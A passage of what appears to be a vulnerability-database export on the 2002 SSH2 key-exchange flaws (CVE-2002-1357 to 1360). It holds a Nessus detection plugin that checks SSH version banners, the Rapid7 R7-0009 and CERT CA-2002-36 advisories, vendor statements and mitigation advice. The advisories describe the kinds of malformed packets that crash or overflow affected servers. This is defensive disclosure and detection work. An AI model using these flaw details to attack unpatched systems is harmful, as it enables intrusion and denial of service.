(cisco_needs_enable(buf)) { flag = 1; override = 1; }\n }\n}\n\n\n\nif (flag)\n{\n security_hole(port:0, extra:report_extra + cisco_caveat(override));\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:20:39", "description": "According to its banner, the remote SSH server is affected by one or more of the following vulnerabilities :\n\n - CVE-2002-1357 (incorrect length)\n\n - CVE-2002-1358 (lists with empty elements/empty strings)\n\n - CVE-2002-1359 (large packets and large fields)\n\n - CVE-2002-1360 (string fields with zeros)\n\nThe impact of successful exploitation of these vulnerabilities varies across products. 
In some cases, remote attackers will be able to execute arbitrary code with the privileges of the SSH process (usually root), although for the products currently tested, the maximum impact is believed to be just a denial of service.", "cvss3": {"score": null, "vector": null}, "published": "2002-12-20T00:00:00", "type": "nessus", "title": "SSH Multiple Remote Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2018-11-15T00:00:00", "cpe": [], "id": "SSH_MULTIVULNS_16122002.NASL", "href": "https://www.tenable.com/plugins/nessus/11195", "sourceData": "#\n# This script was written by Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Revised plugin title, family change (8/10/09)\n# - Updated to use compat.inc, added CVSS score (11/20/2009)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11195);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_xref(name:\"CERT-CC\", value:\"CA-2002-36\");\n\n script_name(english:\"SSH Multiple Remote Vulnerabilities\");\n script_summary(english:\"SSH Multiple Vulnerabilities 16/12/2002\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"It may be possible to crash the SSH server on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote SSH server is affected by one or\nmore of the following vulnerabilities :\n\n - CVE-2002-1357 (incorrect length)\n\n - CVE-2002-1358 (lists with empty elements/empty strings)\n\n - CVE-2002-1359 (large packets and large fields)\n\n - CVE-2002-1360 (string fields with zeros)\n\nThe impact of successful exploitation of these vulnerabilities varies\nacross products. 
In some cases, remote attackers will be able to\nexecute arbitrary code with the privileges of the SSH process (usually\nroot), although for the products currently tested, the maximum impact is\nbelieved to be just a denial of service.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/advisories/R7-0009.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/vulnwatch/2002/q4/88\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for an update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PuTTY Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO); \n script_copyright(english:\"This script is Copyright (C) 2002-2018 Paul Johnston, Westpoint Ltd\");\n script_family(english:\"Misc.\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencie(\"ssh_detect.nasl\", \"os_fingerprint.nasl\");\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"backport.inc\");\nport = get_kb_item(\"Services/ssh\");\nif (!port) port = 22;\n\nbanner = get_kb_item(\"SSH/banner/\" + port);\nif ( ! 
banner ) exit(0);\n\n\nbanner = get_backport_banner(banner:banner);\n\n\n#\n# SSH-2.0-3.2.0 F-Secure SSH Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) F-Secure SSH\", string:banner, icase:TRUE))\n{ \n security_warning(port);\n}\n\n#\n# SSH-2.0-3.2.0 SSH Secure Shell Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) SSH Secure Shell\", string:banner, icase:TRUE))\n{ \n type = get_kb_item(\"Host/OS/Type\");\n if ( isnull(type) || type == \"embedded\" ) exit(0);\n security_warning(port);\n}\n\n#\n# SSH-1.99-Pragma SecureShell 3.0\n# versions up to 2.* affected\n#\nif(ereg(pattern:\"^SSH-1.99-Pragma SecureShell ([12]\\..*)\", string:banner, icase:TRUE))\n{ \n security_warning(port);\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:06", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n_______________________________________________________________________\r\n Rapid 7, Inc. Security Advisory\r\n\r\n Visit http://www.rapid7.com/ to download NeXpose(tm), our\r\n advanced vulnerability scanner. Linux and Windows 2000\r\n versions are available now!\r\n_______________________________________________________________________\r\n\r\nRapid 7 Advisory R7-0009\r\nVulnerabilities in SSH2 Implementations from Multiple Vendors\r\n\r\n Published: December 16, 2002\r\n Revision: 1.0\r\n http://www.rapid7.com/advisories/R7-0009.txt\r\n\r\n CERT: CA-2002-36\r\n http://www.cert.org/advisories/CA-2002-36.html\r\n\r\n CVE: Multiple CVE CANs assigned:\r\n o CAN-2002-1357 (incorrect length)\r\n o CAN-2002-1358 (lists with empty elements/empty strings)\r\n o CAN-2002-1359 (large packets and large fields)\r\n o CAN-2002-1360 (string fields with zeros)\r\n\r\n1. Affected system(s):\r\n\r\n KNOWN VULNERABLE:\r\n o F-Secure Corp. 
SSH servers and clients for UNIX\r\n v3.1.0 (build 11) and earlier\r\n o F-Secure Corp. SSH for Windows\r\n v5.2 and earlier\r\n o SSH Communications Security, Inc. SSH for Windows\r\n v3.2.2 and earlier\r\n o SSH Communications Security, Inc. SSH for UNIX\r\n v3.2.2 and earlier\r\n o FiSSH SSH client for Windows\r\n v1.0A and earlier\r\n o InterSoft Int'l, Inc. SecureNetTerm client for Windows\r\n v5.4.1 and earlier\r\n o NetComposite ShellGuard SSH client for Windows\r\n v3.4.6 and earlier\r\n o Pragma Systems, Inc. SecureShell SSH server for Windows\r\n v2 and earlier\r\n o PuTTY SSH client for Windows\r\n v0.53 and earlier (v0.53b not affected)\r\n o WinSCP SCP client for Windows\r\n v2.0.0 and earlier\r\n\r\n APPARENTLY NOT VULNERABLE:\r\n o BitVise WinSSHD server for Windows v3.05\r\n o LSH v1.5\r\n o OpenSSH v3.5 and earlier\r\n o TTSSH SSH Extension for TeraTerm Pro\r\n o VanDyke SecureCRT client v3.4.3 for Windows\r\n o VanDyke VShell server v1.2 for Windows\r\n\r\n UNKNOWN / NOT TESTED:\r\n o MacSSH\r\n o SSHv1 implementations (see {1})\r\n o SSHv2 enabled network appliances\r\n\r\n2. Summary\r\n\r\n SSH servers and clients from several vendors contain vulnerabilities\r\n that may allow denial-of-service attacks and/or arbitrary code\r\n execution. The vulnerabilities arise from various deficiencies in\r\n the greeting and key-exchange-initialization phases of the SSHv2\r\n transport layer.\r\n\r\n3. Vendor status and information\r\n\r\n F-Secure Corporation\r\n http://www.f-secure.com\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time. F-Secure has characterized this issue as not\r\n exploitable.\r\n\r\n FiSSH\r\n http://pgpdist.mit.edu/FiSSH/index.html\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time.\r\n\r\n NetComposite (ShellGuard)\r\n http://www.shellguard.com\r\n\r\n Vendor has been notified. 
Release information is unknown at\r\n this time.\r\n\r\n Pragma Systems, Inc.\r\n http://www.pragmasys.com\r\n\r\n Vendor has been notified. The fixed version is SecureShell\r\n v3.0, which was released on November 25 2002.\r\n\r\n PuTTY\r\n http://www.chiark.greenend.org.uk/~sgtatham/putty/\r\n\r\n Vendor has been notified. The fixed version is PuTTY v0.53b,\r\n which was released on November 12, 2002.\r\n\r\n SSH Communications Security, Inc.\r\n http://www.ssh.com\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time. SSH, Inc. has characterized this issue as not\r\n exploitable.\r\n\r\n SecureNetTerm (InterSoft International, Inc.)\r\n http://www.securenetterm.com\r\n\r\n Vendor notified. The fixed version is SecureNetTerm v5.4.2,\r\n released on November 14 2002.\r\n\r\n WinSCP2\r\n http://winscp.vse.cz/eng/\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time.\r\n\r\n4. Solution\r\n\r\n No solutions available yet.\r\n\r\n5. Detailed analysis\r\n\r\n To study the correctness and security of SSH server and client\r\n implementations {2}, the security research team at Rapid 7, Inc.\r\n has designed the SSHredder SSH protocol test suite containing\r\n hundreds of sample SSH packets. These invalid and/or atypical\r\n SSH packets focus on the greeting and KEXINIT (key exchange\r\n initialization) phases of SSH connections.\r\n\r\n We then applied the SSHredder suite to some popular SSH servers\r\n and clients, observing their behavior when presented with a\r\n range of different input. Several implementation errors were\r\n discovered, most of which involve memory access violations.\r\n While the impact is different for each product tested, some of\r\n these errors were easily exploitable, allowing the attacker to\r\n overwrite the stack pointer with arbitrary data.\r\n\r\n In most cases, only the most current versions of the applications\r\n were tested. 
Vendors listed as "Apparently NOT VULNERABLE" are\r\n encouraged to run the tests against older versions of their\r\n applications.\r\n\r\n The SSHredder test suite is now available for download from\r\n Rapid 7's web site ( http://www.rapid7.com ). A pre-release\r\n version of SSHredder was provided to SSH vendors for testing\r\n prior to public disclosure. SSHredder has been released under\r\n the BSD license.\r\n\r\n The test cases combine several test groups of similarly\r\n structured data:\r\n\r\n o Invalid and/or incorrect SSH packet lengths (including\r\n zero, very small positive, very large positive, and\r\n negative).\r\n\r\n o Invalid and/or incorrect string lengths. These were applied\r\n to the greeting line(s), plus all the SSH strings in the\r\n KEXINIT packets).\r\n\r\n o Invalid and/or incorrect SSH padding and padding lengths.\r\n\r\n o Invalid and/or incorrect strings, including embedded ASCII\r\n NULs, embedded percent format specifiers, very short, and\r\n very long strings. This test group was applied to the\r\n greeting line(s), plus all the SSH strings in the KEXINIT\r\n packets).\r\n\r\n o Invalid algorithm lists. In addition to the existing string\r\n tests, invalid encryption, compression, and MAC algorithm names\r\n were used, including invalid algorithm domain qualifiers;\r\n invalid algorithm lists were created by manipulating the\r\n separating commas.\r\n\r\n The individual tests in each group were combined systematically to\r\n produce a test suite of 666 packets. A full permutation of every\r\n test in each test group would have yielded a test suite that is too\r\n large to distribute, so a representative sample of packets was\r\n chosen from each group.\r\n\r\n Please note that greeting and KEXINIT are only the first and second\r\n phases of SSH connections. A full test suite for every SSH\r\n protocol message could potentially reveal other latent\r\n vulnerabilities.\r\n\r\n6. 
Notes\r\n\r\n [1] While SSHv1 has no KEXINIT phase, many of these test cases\r\n could affect both SSHv1 and SSHv2 in a generic way). SSHv1\r\n implementations were not tested.\r\n\r\n [2] The SSH protocol is described in several IETF drafts, which can be\r\n found at http://www.ietf.org/ids.by.wg/secsh.html .\r\n\r\n7. Contact Information\r\n\r\n Rapid 7 Security Advisories\r\n Email: advisory@rapid7.com\r\n Web: http://www.rapid7.com/\r\n Phone: +1 (212) 558-8700\r\n\r\n8. Disclaimer and Copyright\r\n\r\n Rapid 7, Inc. is not responsible for the misuse of the information\r\n provided in our security advisories. These advisories are a service\r\n to the professional security community. There are NO WARRANTIES\r\n with regard to this information. Any application or distribution of\r\n this information constitutes acceptance AS IS, at the user's own\r\n risk. This information is subject to change without notice.\r\n\r\n This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is\r\n hereby granted to redistribute this advisory, providing that no\r\n changes are made and that the copyright notices and disclaimers\r\n remain intact.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (OpenBSD)\r\n\r\niD8DBQE9/a5kcL76DCfug6wRAoIdAJ0Xg1HUeXQk5aNzBaKVcS4XP9rlpACguQk6\r\nG2ihG+Zr3V/VE/1C21p4yf4=\r\n=iqCp\r\n-----END PGP SIGNATURE-----\r\n\r\n==============================\r\nRapid 7 Security Research Team\r\nEmail: advisory@rapid7.com\r\nWeb: http://www.rapid7.com/\r\nPhone: +1 (212) 558-8700\r\nPGP: http://www.rapid7.com/advisories/R7-PKey2002.txt\r\n==============================\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2002-12-17T00:00:00", "title": "R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2002-12-17T00:00:00", "id": "SECURITYVULNS:DOC:3882", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:DOC:3882", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:06", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n\r\nCERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations\r\n\r\n Original issue date: December 16, 2002\r\n Last revised: --\r\n Source: CERT/CC\r\n\r\n A complete revision history is at the end of this file.\r\n\r\n\r\nSystems Affected\r\n\r\n * Secure shell (SSH) protocol implementations in SSH clients and\r\n servers from multiple vendors\r\n\r\n\r\nOverview\r\n\r\n Multiple vendors' implementations of the secure shell (SSH) transport\r\n layer protocol contain vulnerabilities that could allow a remote\r\n attacker to execute arbitrary code with the privileges of the SSH\r\n process or cause a denial of service. The vulnerabilities affect SSH\r\n clients and servers, and they occur before user authentication takes\r\n place.\r\n\r\n\r\nI. Description\r\n\r\n The SSH protocol enables a secure communications channel from a client\r\n to a server. From the IETF draft SSH Transport Layer Protocol:\r\n\r\n The SSH transport layer is a secure low level transport protocol.\r\n It provides strong encryption, cryptographic host authentication,\r\n and integrity protection.... Key exchange method, public key\r\n algorithm, symmetric encryption algorithm, message authentication\r\n algorithm, and hash algorithm are all negotiated. \r\n\r\n Rapid7 has developed a suite (SSHredder) of test cases that examine\r\n the connection initialization, key exchange, and negotiation phase\r\n (KEX, KEXINIT) of the SSH transport layer protocol. 
The suite tests\r\n the way an SSH transport layer implementation handles invalid or\r\n incorrect packet and string lengths, padding and padding length,\r\n malformed strings, and invalid algorithms.\r\n\r\n The test suite has demonstrated a number of vulnerabilities in\r\n different vendors' SSH products. These vulnerabilities include buffer\r\n overflows, and they occur before any user authentication takes place.\r\n SSHredder was primarily designed to test key exchange and other\r\n processes that are specific to version 2 of the SSH protocol; however,\r\n certain classes of tests are also applicable to version 1.\r\n\r\n Further information about this set of vulnerabilities may be found in\r\n Vulnerability Note VU#389665.\r\n\r\n Rapid7 has published a detailed advisory (R7-0009) and the SSHredder\r\n test suite.\r\n\r\n Common Vulnerabilities and Exposures (CVE) has assigned the following\r\n candidate numbers for several classes of tests performed by SSHredder:\r\n\r\n * CAN-2002-1357 - incorrect field lengths\r\n * CAN-2002-1358 - lists with empty elements or multiple separators\r\n * CAN-2002-1359 - "classic" buffer overflows\r\n * CAN-2002-1360 - null characters in strings\r\n\r\n\r\nII. Impact\r\n\r\n The impact will vary for different vulnerabilities and products, but\r\n in severe cases, remote attackers could execute arbitrary code with\r\n the privileges of the SSH process. Both SSH servers and clients are\r\n affected, since both implement the SSH transport layer protocol. On\r\n Microsoft Windows systems, SSH servers commonly run with SYSTEM\r\n privileges, and on UNIX systems, SSH daemons typically run with root\r\n privileges. In the case of SSH clients, any attacker-supplied code\r\n would run with the privileges of the user who started the client\r\n program, with the possible exception of SSH clients that may be\r\n configured with an effective user ID of root (setuid root). 
Attackers\r\n could also crash a vulnerable SSH process, causing a denial of\r\n service.\r\n\r\n\r\nIII. Solution\r\n\r\nApply a patch or upgrade\r\n\r\n Apply the appropriate patch or upgrade as specified by your vendor.\r\n See Appendix A below and the Systems Affected section of VU#389665 for\r\n specific information.\r\n\r\nRestrict access\r\n\r\n Limit access to SSH servers to trusted hosts and networks using\r\n firewalls or other packet-filtering systems. Some SSH servers may have\r\n the ability to restrict access based on IP addresses, or similar\r\n effects may be achieved by using TCP wrappers or other related\r\n technology.\r\n\r\n SSH clients can reduce the risk of attacks by only connecting to\r\n trusted servers by IP address.\r\n\r\n While these workarounds will not prevent exploitation of these\r\n vulnerabilities, they will make attacks somewhat more difficult, in\r\n part by limiting the number of potential sources of attacks.\r\n\r\n\r\nAppendix A. Vendor Information\r\n\r\n This appendix contains information provided by vendors. When vendors\r\n report new information, this section is updated and the changes are\r\n noted in the revision history. If a vendor is not listed below, we\r\n have not received their comments. The Systems Affected section of\r\n VU#389665 contains additional vendor status information.\r\n\r\nCisco Systems, Inc.\r\n\r\n The official statement regarding this is that we are not\r\n vulnerable.\r\n\r\nCray Inc.\r\n\r\n Cray Inc. supports the OpenSSH product through their Cray Open\r\n Software (COS) package. COS 3.3, available the end of December\r\n 2002, is not vulnerable. If a site is concerned, they can contact\r\n their local Cray representive to obtain an early copy of the\r\n OpenSSH contained in COS 3.3.\r\n\r\nF-Secure\r\n\r\n F-Secure SSH products are not exploitable via these attacks. 
While\r\n F-Secure SSH versions 3.1.0 build 11 and earlier crash on these\r\n malicious packets, we did not find ways to exploit this to gain\r\n unauthorized access or to run arbitrary code. Furthermore, the\r\n crash occurs in a forked process so the denial of service attacks\r\n are not possible.\r\n\r\nFujitsu\r\n\r\n Fujitsu's UXP/V OS is not vulnerable because it does not support\r\n SSH.\r\n\r\nIBM\r\n\r\n IBM's AIX is not vulnerabible to the issues discussed in CERT\r\n Vulnerability Note VU#389665.\r\n\r\nlsh\r\n\r\n I've now tried the testsuite with the latest stable release of lsh,\r\n lsh-1.4.2. Both the client and the server seem NOT VULNERABLE.\r\n\r\nNetScreen Technologies Inc.\r\n\r\n Tested latest versions. Not Vulnerable.\r\n\r\nOpenSSH\r\n\r\n From my testing it seems that the current version of OpenSSH (3.5)\r\n is not vulnerable to these problems, and some limited testing shows\r\n that no version of OpenSSH is vulnerable.\r\n\r\nPragma Systems, Inc.\r\n\r\n December 16, 2002\r\n\r\n Rapid 7 and CERT Coordination Center Vulnerability report VU#389665\r\n\r\n Pragma Systems Inc. of Austin, Texas, USA, was notified regarding a\r\n possible vulnerability with Version 2.0 of Pragma SecureShell.\r\n Pragma Systems tested Pragma SecureShell 2.0 and the upcoming new\r\n Version 3.0, and found that the attacks did cause a memory access\r\n protection fault on Microsoft platforms.\r\n\r\n After research, Pragma Systems corrected the problem. The\r\n correction of the problem leads us to believe that any attack would\r\n not cause a Denial of Service, or the ability of random code to run\r\n on the server.\r\n\r\n The problem is corrected in Pragma SecureShell Version 3.0. Any\r\n customers with concerns regarding this vulnerability report should\r\n contact Pragma Systems, Inc at support@pragmasys.com for\r\n information on obtaining an upgrade free of charge. 
Pragma's web\r\n site is located at www.pragmasys.com and the company can be reached\r\n at 1-512-219-7270.\r\n\r\nPuTTY\r\n\r\n PuTTY 0.53b addresses vulnerabilities discovered by SSHredder.\r\n\r\nSSH Communications Security\r\n\r\n SSH Secure Shell products are not exploitable via these attacks.\r\n\r\n\r\nAppendix B. References\r\n\r\n * CERT/CC Vulnerability Note: VU#389665 -\r\n http://www.kb.cert.org/vuls/id/389665\r\n * Rapid 7 Advisory: R7-0009 -\r\n http://www.rapid7.com/advisories/R7-0009.txt\r\n * Rapid 7 SSHredder test suite -\r\n http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666\r\n * IETF Draft: SSH Transport Layer Protocol -\r\n http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15.\r\n txt\r\n * IETF Draft: SSH Protocol Architecture -\r\n http://www.ietf.org/internet-drafts/draft-ietf-secsh-architecture-\r\n 13.txt\r\n * Privilege Separated OpenSSH -\r\n http://www.citi.umich.edu/u/provos/ssh/privsep.html\r\n\r\n _________________________________________________________________\r\n\r\n The CERT Coordination Center thanks Rapid7 for researching and\r\n reporting these vulnerabilities.\r\n _________________________________________________________________\r\n\r\n Author: Art Manion.\r\n ______________________________________________________________________\r\n\r\n This document is available from:\r\n http://www.cert.org/advisories/CA-2002-36.html\r\n ______________________________________________________________________\r\n\r\n\r\nCERT/CC Contact Information\r\n\r\n Email: cert@cert.org\r\n Phone: +1 412-268-7090 (24-hour hotline)\r\n Fax: +1 412-268-6989\r\n Postal address:\r\n CERT Coordination Center\r\n Software Engineering Institute\r\n Carnegie Mellon University\r\n Pittsburgh PA 15213-3890\r\n U.S.A.\r\n\r\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\r\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\r\n during other hours, on U.S. 
holidays, and on weekends.\r\n\r\nUsing encryption\r\n\r\n We strongly urge you to encrypt sensitive information sent by email.\r\n Our public PGP key is available from\r\n http://www.cert.org/CERT_PGP.key\r\n\r\n If you prefer to use DES, please call the CERT hotline for more\r\n information.\r\n\r\nGetting security information\r\n\r\n CERT publications and other security information are available from\r\n our web site\r\n http://www.cert.org/\r\n\r\n To subscribe to the CERT mailing list for advisories and bulletins,\r\n send email to majordomo@cert.org. Please include in the body of your\r\n message\r\n\r\n subscribe cert-advisory\r\n\r\n * "CERT" and "CERT Coordination Center" are registered in the U.S.\r\n Patent and Trademark Office.\r\n ______________________________________________________________________\r\n\r\n NO WARRANTY\r\n Any material furnished by Carnegie Mellon University and the Software\r\n Engineering Institute is furnished on an "as is" basis. Carnegie\r\n Mellon University makes no warranties of any kind, either expressed or\r\n implied as to any matter including, but not limited to, warranty of\r\n fitness for a particular purpose or merchantability, exclusivity or\r\n results obtained from use of the material. 
Carnegie Mellon University\r\n does not make any warranty of any kind with respect to freedom from\r\n patent, trademark, or copyright infringement.\r\n _________________________________________________________________\r\n\r\n Conditions for use, disclaimers, and sponsorship information\r\n\r\n Copyright 2002 Carnegie Mellon University.\r\n\r\n Revision History\r\n\r\n December 16, 2002: Initial release\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 6.5.8\r\n\r\niQCVAwUBPf4qimjtSoHZUTs5AQEGbAQAiJcA+QFf2mOElaPIFwEmSRC83xlKifq/\r\nPlmaGbUx2UnwTIi8s2ETF8KjlfQjjgO20B4ms1MMaJ/heyxklOgpeBOQ2mpa2Tnd\r\nyIY7sxpBuRjF1qS6yQ8/OrcsSqVxdxZWkPLAypV11WcJlMmSxxLdKi5t86EsWic3\r\nxazIo8XEipc=\r\n=Nj+0\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2002-12-17T00:00:00", "title": "CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2002-12-17T00:00:00", "id": "SECURITYVULNS:DOC:3883", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3883", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2021-09-28T17:53:41", "description": "### Overview\n\nSecure shell (SSH) transport layer protocol implementations from different vendors contain multiple vulnerabilities in code that handles key exchange and initialization. Both SSH servers and clients are affected. 
A remote attacker could execute arbitrary code with the privileges of the SSH process or cause a denial of service.\n\n### Description\n\nFrom the IETF draft [_SSH Transport Layer Protocol_](<http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15.txt>):\n\n`SSH is a protocol for secure remote login and other secure network services over an insecure network.` \n \n`This document describes the SSH transport layer protocol which typically runs on top of TCP/IP. The protocol can be used as a basis for a number of secure network services. It provides strong encryption, server authentication, and integrity protection. It may also provide compression.` \n \n`Key exchange method, public key algorithm, symmetric encryption algorithm, message authentication algorithm, and hash algorithm are all negotiated.` \nRapid7 has developed a suite of test cases (SSHredder) that examine the connection initialization, key exchange, and negotiation phase (KEX, KEXINIT) of the SSH transport layer protocol. The suite tests the way an SSH transport layer implementation handles invalid or incorrect packet and string lengths, padding and padding length, malformed strings, and invalid algorithms. \n \nThe test suite has demonstrated a number of vulnerabilities in different vendors' SSH products. These vulnerabilities include buffer overflows, and they occur before user authentication takes place. Common Vulnerabilities and Exposures ([CVE](<http://cve.mitre.org/>)) has assigned the following candidate numbers for several classes of tests performed by SSHredder: \n \n[CAN-2002-1357](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1357>): incorrect length fields, i.e. 
specified length field does not match the actual length of the input \n \n[CAN-2002-1358](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1358>): lists with empty elements or multiple separators \n \n[CAN-2002-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1359>): \"classic\" buffer overflows (length field, if present, is consistent with the actual length of buffer) \n \n[CAN-2002-1360](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1360>): null characters in strings (which trigger conflicts between delimiter-based and length-based strings) \nRapid7 has posted an advisory ([R7-0009](<http://www.rapid7.com/advisories/R7-0009.txt>)) and the [SSHredder](<http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666>) test suite. \n \n--- \n \n### Impact\n\nThe impact will vary for different vulnerabilities, but in some cases remote attackers could execute arbitrary code with the privileges of the SSH process. Both SSH servers and clients are affected. On Windows systems, SSH servers commonly run with SYSTEM privileges. SSH daemons on UNIX systems typically run with root privileges. In the case of SSH clients, any attacker-supplied code would run with the privileges of the user who started the client program. Additional privileges may be afforded to an attacker when the SSH client is configured to run with an effective user ID (setuid/setgid) of root. Attackers could also crash a vulnerable SSH process, causing a denial of service. \nWhile OpenSSH does not appear to be affected, it is worth noting that [privilege separation](<http://www.citi.umich.edu/u/provos/ssh/privsep.html>) would greatly reduce the impact of arbitrary code execution during the KEXINIT phase. \n \n--- \n \n### Solution\n\n \n**Upgrade or Apply Patch** \n \nUpgrade or apply a patch as specified by your vendor. 
\n \n--- \n \n \n**Restrict Access** \n \nUntil patches or upgrades are available, it may be possible to limit access to vulnerable SSH clients and servers using the built-in facilities of some SSH implementations, firewalls, packet-filters, [TCP Wrappers](<http://ftp.porcupine.org/pub/security/#software>), or other similar technology. Note that this workaround will not prevent exploitation of these vulnerabilities, it will only limit the number of potential sources of attacks. \n \n**Do Not Trust DNS** \n \nSSH clients can reduce the risk of attacks by only connecting to trusted servers by IP address. Again, this will not prevent attacks, but it will remove the ability of an attacker to redirect a client using DNS cache poisoning or by compromising a DNS server. \n \n--- \n \n### Vendor Information\n\n389665\n\n### Alcatel __ Affected\n\nNotified: December 06, 2002 Updated: May 05, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFollowing CERT advisory CA-2002-36 on security vulnerabilities in the SSH implementations, Alcatel has conducted an immediate assessment to determine any impact this may have on our portfolio. A first analysis showed that various Alcatel products were affected: namely the 6600, 7000 and 8000 OmniSwitches running AOS 5.1.3 and for which corrections had been made available to customers. This issue has now been fixed both in a AOS 5.1.3 maintenance release and in AOS 5.1.4. The security of our customers' networks is of highest priority for Alcatel. 
Therefore we continue to test our product portfolio against potential SSH security vulnerabilities and will provide updates if necessary.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Cisco Systems Inc. __ Affected\n\nNotified: October 19, 2002 Updated: December 20, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCisco Systems has several products that are vulnerable to the attacks posed by the SSHredder test suite. Complete details are available at <http://www.cisco.com/warp/public/707/ssh-packet-suite-vuln.shtml>.\n\nBased on initial testing and evaluation of this vulnerability, earlier versions of this advisory listed Cisco Systems as \"Not Vulnerable.\" Upon additional internal testing it was determined that some Cisco products were indeed vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### F-Secure __ Affected\n\nNotified: October 19, 2002 Updated: December 02, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nF-Secure SSH products are not exploitable via these attacks. While F-Secure SSH versions 3.1.0 build 11 and earlier crash on these malicious packets, we did not find ways to exploit this to gain unauthorized access or to run arbitrary code. 
